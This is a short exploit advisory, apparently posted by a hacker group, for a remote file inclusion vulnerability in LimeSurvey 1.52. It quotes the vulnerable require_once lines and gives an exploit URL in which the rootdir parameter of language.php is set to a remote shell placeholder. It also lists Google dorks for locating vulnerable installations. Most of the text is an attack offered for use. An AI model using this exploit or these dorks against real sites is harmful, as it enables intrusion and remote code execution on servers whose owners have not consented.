LimeSurvey versions 1.52 and below suffer from a remote file inclusion vulnerability.
265d5167d6be0eb574e84294ebecbf040ce54de728cca6d7d9416bc8f5d3f2e2
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : LimeSurvey (PHPSurveyor) 1.52 plus_build 2007.10.16
Download : http://garr.dl.sourceforge.net/sourceforge/limesurvey/limesurvey152plus_build3386_20071016.zip
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : "You have not provided a survey identification number"
Dork2 : "LimeSurvey"
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
require_once($rootdir.'/classes/php-gettext/gettext.php');
require_once($rootdir.'/classes/php-gettext/streams.php');
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/classes/core/language.php?rootdir=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+